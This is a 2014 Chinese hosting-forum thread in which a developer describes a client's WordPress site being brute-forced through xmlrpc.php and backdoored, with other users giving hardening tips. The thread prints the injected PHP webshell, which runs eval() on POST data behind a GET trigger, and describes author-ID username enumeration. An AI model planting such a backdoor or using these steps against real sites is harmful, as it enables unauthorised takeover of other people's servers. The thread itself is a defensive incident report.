全球主机交流论坛

标题: 给别人公司做的网站被黑了~ [打印本页]
作者: Tou    时间: 2014-9-3 21:37
标题: 给别人公司做的网站被黑了~
是WP程序,自己做了个主题,今天他们公司打电话问我是不是网站维护中,网站开不了。
回家看看日志,才发现被黑了

用WP的还是安装一下插件防爆破吧
作者: infokid    时间: 2014-9-3 21:42
用HTML吧
作者: Tou    时间: 2014-9-3 21:42
175.126.111.78 攻击 网站/xmlrpc.php (这个可以对WordPress进行暴力破解攻击)
爆破了几百次就破解了(密码是弱密码)

之后是98.126.97.154登陆后台修改了/wp-admin/theme-editor.php?file=functions.php
<?php
function _g3t($str){
    $val = !empty($_GET[$str]) ? $_GET[$str] : null;
    return $val;
}
if(_g3t('UVF')=='f')
{
@eval($_POST['aEltU']);(一句话木马)
exit;
}
if(_g3t('UVF')=='c')
{
echo 'AcJ9ksbVjsdb';
exit;
}
//dsd6sc378axvg
?>

之后网站就500了(突然发现乱写的代码略屌!)
500再之后N个小时,被发现了


WP不要用弱密码,最好安装个Login Security Solutin



以下应该都是高端肉鸡
175.126.111.78
188.121.62.249
151.236.51.90
37.187.79.43
85.204.118.142
31.193.133.4
212.98.167.210
125.253.118.46
210.210.178.20
31.193.192.184
94.138.219.186
106.187.47.170
212.82.217.9
…………
作者: 你爹临死前    时间: 2014-9-3 21:44
你说。。你好,为提升性能,服务器硬件更新维护
作者: 槛外人    时间: 2014-9-3 21:45
这个文件一般人用不上吧,可以直接删掉或改名么?
作者: fengpioaxue    时间: 2014-9-3 22:12
高端肉鸡。。。
作者: orvice    时间: 2014-9-3 22:13
槛外人 发表于 2014-9-3 21:45
这个文件一般人用不上吧,可以直接删掉或改名么?

不需要这个功能可以改名呗
作者: ninqq    时间: 2014-9-3 22:18
wp 用户名不使用admin这种
密码设置该复杂的 暴力破解过毛线 他用户名都不知道
作者: 气味    时间: 2014-9-3 22:48

用wp帮人弄一个企业站收多少钱?
作者: Tou    时间: 2014-9-3 23:01
ninqq 发表于 2014-9-3 22:18
wp 用户名不使用admin这种
密码设置该复杂的 暴力破解过毛线 他用户名都不知道 ...

http://域名/?author=1 然后就知道非admin的admin权限用户了
我看日志看到的~黑黑 ~略屌

密码我是弱口令了
作者: daigouadmin    时间: 2014-9-3 23:09
Tou 发表于 2014-9-3 23:01
http://域名/?author=1 然后就知道非admin的admin权限用户了
我看日志看到的~黑黑 ~略屌

就是管理员什么名字都无所谓的么
作者: ninqq    时间: 2014-9-3 23:35
Tou 发表于 2014-9-3 23:01
http://域名/?author=1 然后就知道非admin的admin权限用户了
我看日志看到的~黑黑 ~略屌

= -汗,这种算毛个问题
解决方法随便就能想到3个
1:用户链接 改成UID来计算,这样就可以把链接里的ID改成uid达到隐藏目的
2:通过伪静态把访问/?author=1这种格式的链接转出去,或者禁止访问
3:把默认uid1的用户删除或者取消权限,给MJ权限
作者: daigouadmin    时间: 2014-9-3 23:39
ninqq 发表于 2014-9-3 23:35
= -汗,这种算毛个问题
解决方法随便就能想到3个
1:用户链接 改成UID来计算,这样就可以把链接里的ID改成ui ...

高手 WP防黑防破还有什么方法吗
作者: ninqq    时间: 2014-9-3 23:41
本帖最后由 ninqq 于 2014-9-3 23:42 编辑
daigouadmin 发表于 2014-9-3 23:39
高手 WP防黑防破还有什么方法吗


服务器端口不要使用默认的

插件不乱安装 模板不乱使用
前台去除wp版本号

禁止后台编辑插件/上传安装插件
禁止后台在线编辑修改模板
作者: 619054    时间: 2014-9-3 23:42
把機器關了就可以防黑了。
作者: daigouadmin    时间: 2014-9-3 23:44
ninqq 发表于 2014-9-3 23:41
服务器端口不要使用默认的

插件不乱安装 模板不乱使用

作者: 槛外人    时间: 2014-9-4 00:09
Tou 发表于 2014-9-3 23:01
http://域名/?author=1 然后就知道非admin的admin权限用户了
我看日志看到的~黑黑 ~略屌


可以选择公开显示的是昵称而不是登陆用户名,这样别人就不会知道你的真正登陆用户名是什么。
(, 下载次数: 0)
-----------------------------------------------------------------------------------------------------------------------------------------
(, 下载次数: 0)
作者: 冚家产    时间: 2014-9-4 00:11
直接在ssh里输入shutdown就可以放爆破。
作者: skywing    时间: 2014-9-4 00:16
这样一说 我的WP满是漏洞啊
作者: leemw    时间: 2014-9-4 00:20
跟企业说钱没交够。。。补交以后马上好
作者: zzr    时间: 2014-9-4 01:01
Tou 发表于 2014-9-3 23:01
http://域名/?author=1 然后就知道非admin的admin权限用户了
我看日志看到的~黑黑 ~略屌


mjj是不是用的旧版本呀。。

我的访问直接跳转首页的。
http://www.zhangziran.com/?author=1
作者: b121041671    时间: 2014-9-4 08:00
提示: 作者被禁止或删除 内容自动屏蔽
作者: _jerryjee    时间: 2014-9-4 08:33
槛外人 发表于 2014-9-4 00:09
可以选择公开显示的是昵称而不是登陆用户名,这样别人就不会知道你的真正登陆用户名是什么。

---------- ...

没用,author=1一样可以暴出来
作者: zzr    时间: 2014-9-4 09:42
b121041671 发表于 2014-9-4 08:00
这个.htaccess做了301了吧

   没有呀   我闲的蛋疼吗。、。。。。。。。
作者: 槛外人    时间: 2014-9-4 19:23
_jerryjee 发表于 2014-9-4 08:33
没用,author=1一样可以暴出来

我这个版本比较老,可能新版本不一样吧,我这个版本可以选择用昵称取代用户名,达到隐藏登陆用户名的目的。
(, 下载次数: 0)

作者: 一灰    时间: 2014-9-4 20:41
我把后台隐藏起来了,他知道用户名和密码都不知道去哪里登录~~~
作者: 月の天使    时间: 2014-9-4 21:04
感谢提醒
作者: 啪啪啪啪啪    时间: 2014-9-4 22:50
提示: 作者被禁止或删除 内容自动屏蔽
作者: googlebot2    时间: 2014-9-5 10:23
用fail2ban,



欢迎光临 全球主机交流论坛 (https://52.ht/) Powered by Discuz! X3.4